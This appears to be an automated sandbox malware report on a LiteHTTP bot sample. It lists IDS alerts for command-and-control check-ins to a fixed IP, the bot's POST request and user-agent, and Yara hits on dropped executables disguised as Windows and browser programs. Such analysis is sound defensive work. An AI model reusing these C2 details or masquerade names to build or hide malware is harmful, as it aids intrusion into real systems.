                            Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49978 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49990 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49979 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49984 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49975 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49991 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49980 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49998 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49976 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49986 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49989 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49979 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49989 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49979 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49976 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49986 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49976 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49992 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49992 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49987 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49984 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49980 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49987 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49987 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49985 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49991 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49980 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49985 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49998 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49986 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49994 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49984 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49982 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49994 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49982 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49998 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49988 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49990 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49990 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49978 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:50000 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49978 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:50000 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49975 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49988 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49991 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:50000 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49999 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49975 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49981 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49981 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49996 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49981 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49993 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49977 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49996 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49996 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49997 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49993 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49977 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49977 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49993 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49999 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49999 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49983 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49983 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49983 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2830238 - Severity 1 - ETPRO MALWARE Observed LiteHTTP Bot Default User-Agent : 192.168.2.7:49995 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49997 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49997 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2819705 - Severity 1 - ETPRO MALWARE MSIL/LiteHTTP Bot CnC Checkin : 192.168.2.7:49995 -> 87.120.126.5:80
                            Source: Network trafficSuricata IDS: 2829909 - Severity 1 - ETPRO MALWARE LiteHTTP Bot CnC Checkin M2 : 192.168.2.7:49995 -> 87.120.126.5:80
                            Yara detected Generic Downloader
                            Source: Yara matchFile source: 3u8A2xjbBT.exe, type: SAMPLE
                            Source: Yara matchFile source: C:\Users\user\OneDrive\microsoft.net.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\OneDrive\windows nt.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\OneDrive\java.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\OneDrive\windowspowershell.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\OneDrive\google.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\OneDrive\windows portable devices.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\OneDrive\windows media player.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\OneDrive\mozilla maintenance service.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\OneDrive\autoit3.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\OneDrive\windows defender.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\OneDrive\windows mail.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\OneDrive\windows sidebar.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\OneDrive\windows photo viewer.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\OneDrive\microsoft.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\OneDrive\windows multimedia platform.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\OneDrive\internet explorer.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\OneDrive\common files.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\OneDrive\jdownloader.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\OneDrive\reference assemblies.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\OneDrive\msecache.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\OneDrive\uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\OneDrive\microsoft office.exe, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\OneDrive\msbuild.exe, type: DROPPED
                            Source: Joe Sandbox ViewASN Name: UNACS-AS-BG8000BurgasBG UNACS-AS-BG8000BurgasBG
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownTCP traffic detected without corresponding DNS query: 87.120.126.5
                            Source: unknownHTTP traffic detected: POST /VmCetSC7/page.php HTTP/1.1User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3Content-Type: application/x-www-form-urlencodedHost: 87.120.126.5Content-Length: 471Expect: 100-continueConnection: Keep-Alive
                            Source: 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003638000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003524000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.00000000034DB000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003660000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003554000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003688000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002CF7000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002D22000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.0000000003120000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.000000000316D000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.0000000003132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.120.126.5
                            Source: 3u8A2xjbBT.exe, 00000000.00000002.3711597312.00000000033E6000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.0000000003037000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.120.126.5/VmCetSC7/page.php
                            Source: 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003638000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003524000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003660000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.000000000347E000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003554000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000000.00000002.3711597312.0000000003688000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002D22000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 0000000F.00000002.3711404452.0000000002D72000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.000000000316D000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.0000000003089000.00000004.00000800.00020000.00000000.sdmp, 3u8A2xjbBT.exe, 00000010.00000002.3711218629.0000000003132000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://87.120.126.5/VmCetSC7/page.phpP
                            Source: 3u8A2xjbBT.exe, 0000000F.00000002.3716378962.000000000A222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://87.120.126.5/VmCetSC7/page.phpy
                            Source: 3u8A2xjbBT.exe, msbuild.exe.0.dr, mozilla maintenance service.exe.0.dr, windows photo viewer.exe.0.dr, uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe.0.dr, windowspowershell.exe.0.dr, windows media player.exe.0.dr, jdownloader.exe.0.dr, windows portable devices.exe.0.dr, msecache.exe.0.dr, google.exe.0.dr, windows mail.exe.0.dr, common files.exe.0.dr, java.exe.0.dr, windows defender.exe.0.dr, windows sidebar.exe.0.dr, microsoft.net.exe.0.dr, windows multimedia platform.exe.0.dr, windows nt.exe.0.dr, microsoft.exe.0.dr, reference assemblies.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                            Source: 3u8A2xjbBT.exe, msbuild.exe.0.dr, mozilla maintenance service.exe.0.dr, windows photo viewer.exe.0.dr, uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe.0.dr, windowspowershell.exe.0.dr, windows media player.exe.0.dr, jdownloader.exe.0.dr, windows portable devices.exe.0.dr, msecache.exe.0.dr, google.exe.0.dr, windows mail.exe.0.dr, common files.exe.0.dr, java.exe.0.dr, windows defender.exe.0.dr, windows sidebar.exe.0.dr, microsoft.net.exe.0.dr, windows multimedia platform.exe.0.dr, windows nt.exe.0.dr, microsoft.exe.0.dr, reference assemblies.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                            Source: 3u8A2xjbBT.exe, msbuild.exe.0.dr, mozilla maintenance service.exe.0.dr, windows photo viewer.exe.0.dr, uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe.0.dr, windowspowershell.exe.0.dr, windows media player.exe.0.dr, jdownloader.exe.0.dr, windows portable devices.exe.0.dr, msecache.exe.0.dr, google.exe.0.dr, windows mail.exe.0.dr, common files.exe.0.dr, java.exe.0.dr, windows defender.exe.0.dr, windows sidebar.exe.0.dr, microsoft.net.exe.0.dr, windows multimedia platform.exe.0.dr, windows nt.exe.0.dr, microsoft.exe.0.dr, reference assemblies.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                            Source: 3u8A2xjbBT.exe, msbuild.exe.0.dr, mozilla maintenance service.exe.0.dr, windows photo viewer.exe.0.dr, uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe.0.dr, windowspowershell.exe.0.dr, windows media player.exe.0.dr, jdownloader.exe.0.dr, windows portable devices.exe.0.dr, msecache.exe.0.dr, google.exe.0.dr, windows mail.exe.0.dr, common files.exe.0.dr, java.exe.0.dr, windows defender.exe.0.dr, windows sidebar.exe.0.dr, microsoft.net.exe.0.dr, windows multimedia platform.exe.0.dr, windows nt.exe.0.dr, microsoft.exe.0.dr, reference assemblies.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                            Source: 3u8A2xjbBT.exe, msbuild.exe.0.dr, mozilla maintenance service.exe.0.dr, windows photo viewer.exe.0.dr, uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe.0.dr, windowspowershell.exe.0.dr, windows media player.exe.0.dr, jdownloader.exe.0.dr, windows portable devices.exe.0.dr, msecache.exe.0.dr, google.exe.0.dr, windows mail.exe.0.dr, common files.exe.0.dr, java.exe.0.dr, windows defender.exe.0.dr, windows sidebar.exe.0.dr, microsoft.net.exe.0.dr, windows multimedia platform.exe.0.dr, windows nt.exe.0.dr, microsoft.exe.0.dr, reference assemblies.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                            Source: 3u8A2xjbBT.exe, msbuild.exe.0.dr, mozilla maintenance service.exe.0.dr, windows photo viewer.exe.0.dr, uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe.0.dr, windowspowershell.exe.0.dr, windows media player.exe.0.dr, jdownloader.exe.0.dr, windows portable devices.exe.0.dr, msecache.exe.0.dr, google.exe.0.dr, windows mail.exe.0.dr, common files.exe.0.dr, java.exe.0.dr, windows defender.exe.0.dr, windows sidebar.exe.0.dr, microsoft.net.exe.0.dr, windows multimedia platform.exe.0.dr, windows nt.exe.0.dr, microsoft.exe.0.dr, reference assemblies.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                            Source: 3u8A2xjbBT.exe, msbuild.exe.0.dr, mozilla maintenance service.exe.0.dr, windows photo viewer.exe.0.dr, uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe.0.dr, windowspowershell.exe.0.dr, windows media player.exe.0.dr, jdownloader.exe.0.dr, windows portable devices.exe.0.dr, msecache.exe.0.dr, google.exe.0.dr, windows mail.exe.0.dr, common files.exe.0.dr, java.exe.0.dr, windows defender.exe.0.dr, windows sidebar.exe.0.dr, microsoft.net.exe.0.dr, windows multimedia platform.exe.0.dr, windows nt.exe.0.dr, microsoft.exe.0.dr, reference assemblies.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                            Source: autoit3.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                            Source: 3u8A2xjbBT.exe, msbuild.exe.0.dr, mozilla maintenance service.exe.0.dr, windows photo viewer.exe.0.dr, uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe.0.dr, windowspowershell.exe.0.dr, windows media player.exe.0.dr, jdownloader.exe.0.dr, windows portable devices.exe.0.dr, msecache.exe.0.dr, google.exe.0.dr, windows mail.exe.0.dr, common files.exe.0.dr, java.exe.0.dr, windows defender.exe.0.dr, windows sidebar.exe.0.dr, microsoft.net.exe.0.dr, windows multimedia platform.exe.0.dr, windows nt.exe.0.dr, microsoft.exe.0.dr, reference assemblies.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                            Source: 3u8A2xjbBT.exe, msbuild.exe.0.dr, mozilla maintenance service.exe.0.dr, windows photo viewer.exe.0.dr, uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe.0.dr, windowspowershell.exe.0.dr, windows media player.exe.0.dr, jdownloader.exe.0.dr, windows portable devices.exe.0.dr, msecache.exe.0.dr, google.exe.0.dr, windows mail.exe.0.dr, common files.exe.0.dr, java.exe.0.dr, windows defender.exe.0.dr, windows sidebar.exe.0.dr, microsoft.net.exe.0.dr, windows multimedia platform.exe.0.dr, windows nt.exe.0.dr, microsoft.exe.0.dr, reference assemblies.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
                            Source: 3u8A2xjbBT.exe, msbuild.exe.0.dr, mozilla maintenance service.exe.0.dr, windows photo viewer.exe.0.dr, uyihfjjsbovlcbxlcojsmqtzznevrdoctnxfvfrajmemtqlbiqoohtfay.exe.0.dr, windowspowershell.exe.0.dr, windows media player.exe.0.dr, jdownloader.exe.0.dr, windows portable devices.exe.0.dr, msecache.exe.0.dr, google.exe.0.dr, windows mail.exe.0.dr, common files.exe.0.dr, java.exe.0.dr, windows defender.exe.0.dr, windows sidebar.exe.0.dr, microsoft.net.exe.0.dr, windows multimedia platform.exe.0.dr, windows nt.exe.0.dr, microsoft.exe.0.dr, reference assemblies.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
